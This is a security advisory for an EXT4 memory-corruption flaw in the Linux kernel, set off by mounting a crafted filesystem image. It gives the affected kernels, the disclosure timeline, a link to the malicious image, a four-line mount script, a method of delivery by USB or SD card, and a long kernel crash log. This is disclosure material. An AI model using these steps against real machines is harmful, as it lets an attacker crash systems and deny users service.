Linux Kernel EXT4 Memory Corruption / SLAB Out-Of-Bounds Read
Posted on 30 November -0001
<HTML><HEAD><TITLE>Linux Kernel EXT4 Memory Corruption / SLAB Out-Of-Bounds Read</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>OS-S Security Advisory 2016-22 Local DoS: Linux Kernel EXT4 Memory Corruption / SLAB-Out-of-Bounds Read Date: October 31th, 2016 Authors: Sergej Schumilo, Ralf Spenneberg CVE: Not yet assigned CVSS: 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C) Severity: Critical Ease of Exploitation: Trivial Vulnerability Type: Memory Corruption / SLAB-Out-of-Bounds Read Abstract: Mounting a crafted EXT4 image read-only leads to a memory corruption and SLAB-Out-of-Bounds Reads (according to KASAN). Since the mounting procedure is a privileged operation, an attacker is probably not able to trigger this vulnerability on the commandline. Instead the automatic mounting feature of the GUI via a crafted USB-device is required. Detailed product description: We have verified the bug on the following kernel builds: Ubuntu Server 16.10 (GNU/Linux 4.8.0-22-generic x86_64) RedHat Kernel 3.10.0-327.18.2.el7.x86_64 Vendor Communication: We contacted RedHat on May, 03th 2016. To this day, no security patch was provided by the vendor. We publish this Security Advisory in accordance with our responsible disclosure policy. Reference: https://bugzilla.redhat.com/show_bug.cgi?id=1332503 Proof of Concept: As a proof of concept, we are providing the image that is causing the memory corruption / use-after-free. For demonstration purposes a script to mount this filesystem is also attached. Severity and Ease of Exploitation: The vulnerability can be easily exploited as a Denial-of-Service remotely by using a USB-device. In this case the attacker must copy this image (e.g. using dd) to a device or storage such as a SD-card which can be set to read-only mode (using the write-protection switch). Mount-Script: cp ext4_fs_file /tmp/ mkdir /tmp/a losetup /dev/loop0 /tmp/ext4_fs_file mount -o ro /dev/loop0 /tmp/a Malicious EXT4-Image: https://os-s.net/advisories/OSS-2016-22-image KASAN-Report: https://os-s.net/advisories/OSS-2016-22-KASAN dmesg-Report: / # ./mount.sh [ 56.421839] EXT4-fs (loop0): ext4_check_descriptors: Checksum for group 0 failed (25303!=248) [ 56.437702] BUG: unable to handle kernel paging request at ffff880016161000 [ 56.446533] IP: [<ffffffffc005aa6f>] ext4_calculate_overhead+0x29f/0x370 [ext4] [ 56.454410] PGD 1fee067 PUD 1fef067 PMD 16160063 BAD [ 56.461593] Oops: 000b [#1] SMP [ 56.467235] Modules linked in: ext4(OE) mbcache(E) jbd2(E) [ 56.476475] CPU: 0 PID: 145 Comm: mounter Tainted: G OE 4.6.0-rc6 #4 [ 56.486022] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014 [ 56.503885] task: ffff88001ee33300 ti: ffff88001e850000 task.ti: ffff88001e850000 [ 56.514936] RIP: 0010:[<ffffffffc005aa6f>] [<ffffffffc005aa6f>] ext4_calculate_overhead+0x29f/0x370 [ext4] [ 56.528848] RSP: 0018:ffff88001e853c38 EFLAGS: 00010297 [ 56.536256] RAX: 0000000032323200 RBX: ffff88001613c000 RCX: 0000000000000000 [ 56.546277] RDX: 0000000000128000 RSI: 0000000000128001 RDI: 0000000032323201 [ 56.556046] RBP: ffff88001e853c98 R08: ffff8800160b8400 R09: 0000000000000000 [ 56.565942] R10: ffff88001ee85000 R11: ffff88001ee84800 R12: ffff88001ee85000 [ 56.575833] R13: 0000000000000005 R14: 0000000000000000 R15: 0000000000000000 [ 56.587260] FS: 00007fc4e7e6f700(0000) GS:ffff88001e400000(0000) knlGS:0000000000000000 [ 56.597788] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 56.607823] CR2: ffff880016160b08 CR3: 000000000011b000 CR4: 00000000000006f0 [ 56.618769] Stack: [ 56.622341] ffff88001ee85000 0000000000000000 0000000100000001 0000000000000000 [ 56.634376] 0000000000000001 ffff88001ee84800 0000000000001fff 0000000000000001 [ 56.645606] ffff8800160b8400 0000000000000000 ffff88001ee84800 ffff88001ee85000 [ 56.656883] Call Trace: [ 56.660786] [<ffffffffc005c6c5>] ext4_fill_super+0x1b85/0x32c0 [ext4] [ 56.669671] [<ffffffff81367579>] ? snprintf+0x39/0x40 [ 56.676400] [<ffffffff8120688b>] mount_bdev+0x17b/0x1b0 [ 56.682302] [<ffffffffc005ab40>] ? ext4_calculate_overhead+0x370/0x370 [ext4] [ 56.694070] [<ffffffffc004c935>] ext4_mount+0x15/0x20 [ext4] [ 56.701554] [<ffffffff812071b8>] mount_fs+0x38/0x160 [ 56.708763] [<ffffffff811a6245>] ? __alloc_percpu+0x15/0x20 [ 56.717214] [<ffffffff81222847>] vfs_kern_mount+0x67/0x110 [ 56.723703] [<ffffffff81224fe8>] do_mount+0x228/0xdc0 [ 56.731254] [<ffffffff811e4e01>] ? __kmalloc_track_caller+0x31/0x220 [ 56.741002] [<ffffffff811a0ab2>] ? memdup_user+0x42/0x70 [ 56.748223] [<ffffffff81225ea5>] SyS_mount+0x95/0xe0 [ 56.756591] [<ffffffff817b6176>] entry_SYSCALL_64_fastpath+0x1e/0xa8 [ 56.766191] Code: 4c 89 5d c8 89 55 b4 e8 c0 60 fd ff 85 c0 4c 8b 5d c8 0f 8e 46 ff ff ff 8b 55 b4 8d 3c 02 41 8b 4c 24 54 8d 72 01 d3 fa 48 63 d2 <48> 0f ab 13 39 fe 89 f2 75 e9 41 01 c5 e9 21 ff ff ff 49 8b 83 [ 56.800243] RIP [<ffffffffc005aa6f>] ext4_calculate_overhead+0x29f/0x370 [ext4] [ 56.811328] RSP <ffff88001e853c38> [ 56.816875] CR2: ffff880016161000 [ 56.821488] ---[ end trace 70027566e5b28840 ]--- [ 56.826472] BUG: unable to handle kernel paging request at ffff8800160b6100 [ 56.834290] IP: [<ffffffff810b4257>] task_tick_fair+0x4a7/0x980 [ 56.842839] PGD 1fee067 PUD 1fef067 PMD 16160063 BAD [ 56.850310] Oops: 000b [#2] SMP [ 56.856901] Modules linked in: ext4(OE) mbcache(E) jbd2(E) [ 56.865616] CPU: 0 PID: 145 Comm: mounter Tainted: G D OE 4.6.0-rc6 #4 [ 56.875621] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014 [ 56.892863] task: ffff88001ee33300 ti: ffff88001e850000 task.ti: ffff88001e850000 [ 56.902648] RIP: 0010:[<ffffffff810b4257>] [<ffffffff810b4257>] task_tick_fair+0x4a7/0x980 [ 56.914488] RSP: 0018:ffff88001e403dd0 EFLAGS: 00010002 [ 56.922043] RAX: fffffffffffffda2 RBX: ffff88001e87a000 RCX: 000000000000025e [ 56.932215] RDX: 0000000000000019 RSI: ffff88001e416c40 RDI: ffff8800160b6000 [ 56.940606] RBP: ffff88001e403e48 R08: ffffffffffffffff R09: 0000000000000001 [ 56.952012] R10: 0000000000000000 R11: 0000000000000001 R12: 0000000000005e99 [ 56.961436] R13: 00000000000000f0 R14: ffff88001ee33380 R15: ffff88001e87a000 [ 56.968021] FS: 00007fc4e7e6f700(0000) GS:ffff88001e400000(0000) knlGS:0000000000000000 [ 56.980306] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 56.987740] CR2: ffff8800161605b0 CR3: 000000000011b000 CR4: 00000000000006f0 [ 56.995946] Stack: [ 56.997897] 0000000000000000 ffff88001ee33300 ffff88001e416c40 0000000000005eaa [ 57.007230] ffff880000000000 0000000000000400 ffff880000000000 ffff88001e416c40 [ 57.017866] 000000001e403e30 ffff88001ee33380 ffff88001e416c40 0000000000016c40 [ 57.024945] Call Trace: [ 57.027693] <IRQ> [ 57.030393] [<ffffffff810a643c>] scheduler_tick+0x5c/0xd0 [ 57.036102] [<ffffffff810f5060>] ? tick_sched_handle.isra.13+0x60/0x60 [ 57.043808] [<ffffffff810e5be1>] update_process_times+0x51/0x60 [ 57.050493] [<ffffffff810f5025>] tick_sched_handle.isra.13+0x25/0x60 [ 57.058897] [<ffffffff810f509d>] tick_sched_timer+0x3d/0x70 [ 57.065082] [<ffffffff810e6464>] __hrtimer_run_queues+0xe4/0x250 [ 57.070516] [<ffffffff810e6bd8>] hrtimer_interrupt+0xa8/0x1a0 [ 57.077781] [<ffffffff8104f948>] local_apic_timer_interrupt+0x38/0x60 [ 57.083346] [<ffffffff817b89ed>] smp_apic_timer_interrupt+0x3d/0x50 [ 57.091424] [<ffffffff817b6d62>] apic_timer_interrupt+0x82/0x90 [ 57.099326] <EOI> [ 57.102170] [<ffffffff81102911>] ? acct_collect+0x171/0x1a0 [ 57.109009] [<ffffffff8107eb4b>] do_exit+0x4db/0xb10 [ 57.115915] [<ffffffff8102fa93>] oops_end+0xa3/0xd0 [ 57.122250] [<ffffffff810666b0>] no_context+0x110/0x370 [ 57.129398] [<ffffffff81066991>] __bad_area_nosemaphore+0x81/0x200 [ 57.138090] [<ffffffff81066b24>] bad_area_nosemaphore+0x14/0x20 [ 57.146376] [<ffffffff81066ec0>] __do_page_fault+0xc0/0x4c0 [ 57.153429] [<ffffffff811e0015>] ? new_slab+0x3b5/0x5d0 [ 57.163147] [<ffffffff81067327>] trace_do_page_fault+0x37/0xd0 [ 57.169386] [<ffffffff8105fa99>] do_async_page_fault+0x19/0x70 [ 57.174572] [<ffffffff817b8118>] async_page_fault+0x28/0x30 [ 57.181017] [<ffffffffc005aa6f>] ? ext4_calculate_overhead+0x29f/0x370 [ext4] [ 57.188992] [<ffffffffc005aa50>] ? ext4_calculate_overhead+0x280/0x370 [ext4] [ 57.196489] [<ffffffffc005c6c5>] ext4_fill_super+0x1b85/0x32c0 [ext4] [ 57.205539] [<ffffffff81367579>] ? snprintf+0x39/0x40 [ 57.211646] [<ffffffff8120688b>] mount_bdev+0x17b/0x1b0 [ 57.218941] [<ffffffffc005ab40>] ? ext4_calculate_overhead+0x370/0x370 [ext4] [ 57.228329] [<ffffffffc004c935>] ext4_mount+0x15/0x20 [ext4] [ 57.234328] [<ffffffff812071b8>] mount_fs+0x38/0x160 [ 57.240946] [<ffffffff811a6245>] ? __alloc_percpu+0x15/0x20 [ 57.246275] [<ffffffff81222847>] vfs_kern_mount+0x67/0x110 [ 57.250890] [<ffffffff81224fe8>] do_mount+0x228/0xdc0 [ 57.255725] [<ffffffff811e4e01>] ? __kmalloc_track_caller+0x31/0x220 [ 57.261346] [<ffffffff811a0ab2>] ? memdup_user+0x42/0x70 [ 57.266554] [<ffffffff81225ea5>] SyS_mount+0x95/0xe0 [ 57.274193] [<ffffffff817b6176>] entry_SYSCALL_64_fastpath+0x1e/0xa8 [ 57.280765] Code: 8b bb e8 00 00 00 48 29 d0 48 81 ff 00 eb ee 81 74 2c 49 89 c0 48 c1 ea 06 49 c1 f8 3f 4c 89 c1 48 31 c1 4c 29 c1 48 39 d1 76 13 <3e> 48 01 87 00 01 00 00 48 8b 43 78 48 89 83 98 00 00 00 65 8b [ 57.312620] RIP [<ffffffff810b4257>] task_tick_fair+0x4a7/0x980 [ 57.319317] RSP <ffff88001e403dd0> [ 57.322494] CR2: ffff8800160b6100 [ 57.326972] ---[ end trace 70027566e5b28841 ]--- [ 57.333540] Kernel panic - not syncing: Fatal exception in interrupt [ 57.346993] Kernel Offset: disabled [ 57.350049] Rebooting in 1 seconds.. -- OpenSource Training Ralf Spenneberg http://www.os-t.de Am Bahnhof 3-5 48565 Steinfurt Germany Fon: +49(0)2552 638 755 Fax: +49(0)2552 638 757 </BODY></HTML>